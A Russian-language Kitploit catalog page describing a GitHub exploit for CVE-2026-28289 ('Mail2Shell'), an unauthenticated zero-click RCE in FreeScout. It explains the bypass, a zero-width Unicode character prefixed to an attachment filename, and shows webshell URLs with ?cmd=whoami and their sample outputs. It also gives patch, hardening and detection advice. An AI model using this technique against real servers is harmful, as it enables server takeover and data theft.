Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-28289 — CVE-2026-28289 | Kitploit
Инструменты/GitHubGitHub/0xblackash/cve-2026-28289
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной НагрузкиБезопасность Электронной Почты
GitHub0xblackash/cve-2026-28289

CVE-2026-28289

CVE-2026-28289

Репозиторий
156 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2026-28289 — «Mail2Shell»

1772564185117

Zero-Click RCE без аутентификации в FreeScout через обход проверки вложений электронной почты

Severity CVSS Affected Patched


📖 Обзор

CVE-2026-28289, прозванная Mail2Shell, — это критическая zero-click уязвимость удалённого выполнения кода (RCE), затрагивающая FreeScout.

Злоумышленник может отправить специально сформированное электронное письмо на почтовый ящик FreeScout и получить удалённый доступ к командной оболочке (shell) базового сервера — без аутентификации и без взаимодействия с пользователем.


🧠 Сводка по уязвимости

Скачать инструмент
ПолеЗначение
CVE IDCVE-2026-28289
Критичность🔴 Критическая
CVSS10.0 (Максимум)
Вектор атакиУдалённый (Email)
Требуется аутентификация❌ Нет
Взаимодействие с пользователем❌ Нет
ВоздействиеПолная компрометация сервера

⚙️ Технический разбор

📨 Шаг 1 — Доставка вредоносного письма

Злоумышленник отправляет письмо со специально сформированным вложением.

🧩 Шаг 2 — Обход санитизации имени файла

FreeScout пытается блокировать опасные файлы, такие как .htaccess, но злоумышленник:

  • Добавляет в начало символ Unicode нулевой ширины
  • Обходит проверку имени файла
  • Файл сохраняется как валидный исполняемый серверный файл

💣 Шаг 3 — Удалённое выполнение

Злоумышленник обращается к загруженному файлу по веб-пути и выполняет произвольные команды.

Результат:

root@kitploit:~
# Remote shell access achieved
whoami
www-data

✅ Если операция прошла успешно, вот ЧТО ИМЕННО вы увидите (шаг за шагом):

mail2shell

1. В вашем терминале (сразу после запуска скрипта)

root@kitploit:~
✅ Email sent successfully! (Zero-Click RCE triggered)

На экран также будут выведены инструкции для следующих шагов.

2. Когда вы выполните команду find на вашем сервере FreeScout через SSH

Она немедленно вернёт полный реальный путь к загруженному файлу, например:

root@kitploit:~
/var/www/html/storage/attachment/2026/03/05/15/webshell.txt

(или похожую папку с датой/временем — это подтверждает, что FreeScout сохранил вложение автоматически).

3. НАСТОЯЩЕЕ доказательство успеха — в вашем браузере (это момент, когда вы понимаете, что у вас полное RCE)

Скопируйте путь из шага 2 и откройте этот URL:

root@kitploit:~
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=whoami

Вы увидите именно такой вывод (простой текст):

root@kitploit:~
www-data

(Или каким бы ни был пользователь Apache/PHP на вашем сервере — обычно www-data, apache или nobody).

Теперь измените команду и обновите страницу:

root@kitploit:~
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=id

Вы увидите:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

А для ls -la:

root@kitploit:~
total 12
drwxr-xr-x 2 www-data www-data 4096 Mar  5 15:00 .
drwxr-xr-x 8 www-data www-data 4096 Mar  5 14:00 ..
-rw-r--r-- 1 www-data www-data   87 Mar  5 15:00 webshell.txt

Этот вывод появляется напрямую на странице браузера (внутри тегов <pre> веб-оболочки). Никаких ошибок, никакого исходного кода PHP, никакой 404.

Это означает, что у вас полное удалённое выполнение кода на сервере — обход через .htaccess + пробел нулевой ширины сработал идеально, а вложение электронной почты было обработано без какого-либо взаимодействия с пользователем.


🎯 Почему это опасно

  • ⚡ Эксплуатация zero-click (без действий пользователя)
  • 🌐 Удалённая поверхность атаки (email)
  • 🔓 Аутентификация не требуется
  • 🧨 Полноценное RCE
  • 📂 Потенциальная утечка данных
  • 🔁 Латеральное перемещение (lateral movement) во внутренних сетях

📦 Затронутые версии

Все версии FreeScout:

root@kitploit:~
<= 1.8.206

✅ Исправленная версия

Немедленно обновитесь до:

root@kitploit:~
1.8.207 or later

🛡️ Шаги по смягчению последствий

1️⃣ Немедленные действия

  • Обновите FreeScout до последней версии

2️⃣ Усиление защиты веб-сервера

  • Отключите AllowOverride All в конфигурации Apache
  • Запретите выполнение кода в каталогах вложений

3️⃣ Мониторинг журналов

Обратите внимание на:

  • Подозрительные файлы .htaccess
  • Необычные загрузки вложений
  • Попытки прямого доступа к /storage/attachments/

🔍 Советы по обнаружению

Индикаторы компрометации могут включать:

  • Неизвестные файлы .htaccess в папках вложений
  • Всплески исходящего трафика
  • Веб-сервер порождает shell-процессы
  • Подозрительные POST/GET-запросы к путям вложений

🧪 Proof-of-Concept (Концептуальный)

root@kitploit:~
Email → Malicious Attachment (Unicode prefixed filename)
        ↓
Saved to predictable path
        ↓
Web-accessible execution
        ↓
Remote shell

📌 Связанная уязвимость

Эта проблема обошла защиту, добавленную в:

  • CVE-2026-27636

Что демонстрирует неполную логику санитизации имён файлов.


📊 Оценка воздействия

Область рискаВоздействие
Конфиденциальность🔴 Высокое
Целостность🔴 Высокое
Доступность🔴 Высокое

🧩 Извлечённые уроки

  • Обработка Unicode должна нормализовываться до проверки
  • Никогда не полагайтесь только на фильтрацию имён файлов
  • В каталогах вложений никогда не должно разрешаться выполнение кода
  • Zero-click векторы — это поверхности атаки с высоким риском

📚 Ссылки

  • Security Advisory FreeScout
  • Запись NVD для CVE-2026-28289

🚨 Финальная рекомендация

Если вы запускаете собственный экземпляр FreeScout (self-hosted):

🔥 Немедленно установите патч. 💡 Считайте, что система скомпрометирована, если уязвимая версия была доступна из интернета. 🛡 Проведите анализ журналов и проверку целостности.